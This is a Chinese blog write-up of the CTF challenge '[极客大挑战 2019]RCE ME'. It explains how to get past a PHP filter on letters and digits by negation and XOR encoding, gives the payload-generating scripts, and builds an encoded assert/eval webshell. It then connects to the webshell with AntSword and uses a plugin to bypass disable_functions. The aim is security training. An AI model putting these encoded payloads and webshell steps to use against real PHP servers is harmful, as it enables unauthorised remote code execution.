【[极客大挑战 2019]RCE ME 1】

于 2024-07-11 20:35:42 发布
阅读量459 收藏 6
点赞数 11
分类专栏: CTF-web-wp 文章标签: web安全 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ubaichu/article/details/140361077
版权

目录

题目

在这里插入图片描述

代码分析

过滤了大小写字母和数字,传入函数后可以执行,我们先尝试传入phpinbfo,再尝试传入一句话木马。

传入phpinfo

我们的目标是传入phpinfo执行
有两种方式可以绕过
1、取反绕过:取反后url编码
取反后,url解码会解成不可打印字符,绕过过滤

<?php
$a = 'phpinfo';
$b = urlencode(~$a);
$c = '(~'.$b.')();';
echo $c;
?>

结果:(~%8F%97%8F%96%91%99%90)();
2、异或绕过
结果:(%22%80%80%80%80%80%80%80%22^%22%f0%e8%f0%e9%ee%e6%ef%22)();

payload:?code=(~%8F%97%8F%96%91%99%90)();
get传入后得到phpinfo界面在这里插入图片描述
搜索flag无果
发现禁用的函数
在这里插入图片描述

传入一句话木马

接下来我们尝试构造一句话木马
eval 属于PHP语法构造的一部分,eval()是一个语言构造器,不能被可变函数调用,所以不能通过 变量函数的形式来调用
assert不可以执行’echo 1’等命令
我们使用的一句话木马:(assert)(eval($_POST[“test”]))

取反:

<?php

//(assert)(eval($_POST['g']))
$a = 'assert';
$b = urlencode(~$a);
$c = '(eval($_POST[g]))';
$d = urlencode(~$c);
$e = '(~'.$b.')'.'(~'.$d.')';
echo $e;
?>

结果:
(%9E%8C%8C%9A%8D%8B)(%D7%9A%89%9E%93%D7%DB%A0%AF%B0%AC%AB%A4%98%A2%D6%D6)

用蚁剑连接

在这里插入图片描述
发现flag但是无法查看,需要用插件绕过

使用插件读取flag

利用蚁剑中自带的插件:绕过diasble_functions
(这个插件只能在linux中使用)
在这里插入图片描述
在这里插入图片描述
点击开始,然后readflag
在这里插入图片描述

白初&
关注
专栏目录
[极客挑战 2019]RCE ME
没有任何buff的小菜鸡的博客
03-06 374
突然有觉得这道题双解法挺好的就记录一下嗷 题目: <?php error_reporting(0); if(isset($_GET['code'])){ $code=$_GET['code']; if(strlen($code)>40){ die("This is too Long.");
BUUCTF[极客挑战 2019]RCE ME1
wyp106343873的博客
12-06 1261
一个个人的学习过程
[极客挑战 2019]RCE ME 1
qq_53460654的博客
06-03 706
打开环境 ?php error_reporting(0); if(isset($_GET['code'])){ $code=$_GET['code']; if(strlen($code)>40){ die("This is too Long."); }
[极客挑战 2019]RCE ME writeup + 无字母数字命令执行
ShenZ的博客
09-09 460
我以后再半夜开题目我就是【】 知识点 利用取反运算符绕过无字母数字正则表达式 取反之后基本上都是不可见字符 yu22x大佬的php脚本: <?php fwrite(STDOUT,'[+]your function: '); $system=str_replace(array("\r\n", "\r", "\n"), "", fgets(STDIN)); fwrite(STDOUT,'[+]your command: '); $command=str_replace(array("\r\n", "\
cve_2019_0708_bluekeep_rce:蓝皮漏洞利用
04-29
cve_2019_0708_bluekeep_rce.rb 添加 /usr/share/metasploit-framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb rdp.rb 替换 /usr/share/metasploit-framework/lib/msf/core/exploit/rdp.rb ...
CVE-2019-1003000 Jenkins-PreAuth-RCE 复现过程1
08-04
2019年,一个名为CVE-2019-1003000的安全漏洞被公开,允许未经身份验证的攻击者执行远程代码,即所谓的预认证远程代码执行(PreAuth RCE)。这个漏洞的影响非常严重,因为它无需任何登录凭据即可利用。 漏洞复现...
ThinkPHP3.2.x RCE漏洞通报1
08-03
【ThinkPHP3.2.x RCE漏洞通报】中提到的安全问题涉及到ThinkPHP 3.2版本的一个严重远程代码执行漏洞。这个漏洞源于框架中的`assign`方法,该方法用于将变量传递给模板进行渲染。当攻击者能够控制`assign`方法的第一...
BUUCTF 36
qq_52431855的博客
03-03 257
知识点 preg_match() 函数 语法:int preg_match ( string $pattern , string $subject [, array &$matches [, int $flags = 0 [, int $offset = 0 ]]] ) 参数: 作用:在subject 字符串中搜索与pattern给出的正则表达式相匹配的内容。 关于PHP正则的一些绕过方法 36-1[BSidesCF 2019]Futurella 做题...
【BUUCTF】[极客挑战 2019]RCE ME
aoao331198的博客
07-09 676
源码 首先是PHP正则绕过,有长度限制,考虑使用取反绕过 首先试试看看phpinfo 重点看这个禁用函数,禁用了很多函数 下一步试着传木马 蚁剑连接一下,显然这里需要 但是由于禁用了命令执行的函数,这里要进行绕过 网上有两种方法,一种是使用蚁剑的插件,科学上网才能下载得到 另一种是通过 & 绕过 这里不做详细讲述了,具体可以看看我的个人博客here 上传文件后使用PL...
[极客挑战 2019]RCE ME1 ~~不会编程的崽
最新发布
不会编程的崽的博客
02-15 809
rce 取反绕过
weblogic_rce:cve2019_2725,CNVD-C-2019-48814 Weblogic _async远程命令执行exp
03-15
CNVD-C-2019-48814,CVE-2019-2725 Weblogic _async远程命令执行exp 主要代码基于js实现。 Linux Payload使用Jason,Windows Payload修改为10271,执行java.lang.Runtime。 环境需求 Windows的所有版本。 用法 cve...
PbootCms-3.04前台RCE挖掘过程1
08-03
### PbootCms-3.04前台RCE挖掘过程详解 #### 背景介绍 PbootCms是一款开源的内容管理系统(CMS),用于构建网站和管理内容。在其3.04版本中发现了一个远程代码执行(Remote Code Execution, RCE)的安全漏洞。此...
[极客挑战 2019]RCE ME buuctf 题目详解思路
weixin_73560599的博客
08-31 930
非常经典的无字母数字RCE 且这套题目加了些过滤条件 不是特别难 只是有个disable_function 是需要注意的
[极客挑战 2019]RCE ME 取反绕过正则匹配 绕过disable_function设置
m0_64180167的博客
09-22 866
有意思。。。。过滤了数字字母我们要绕过并且执行rce这里使用取反和异或都可以。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值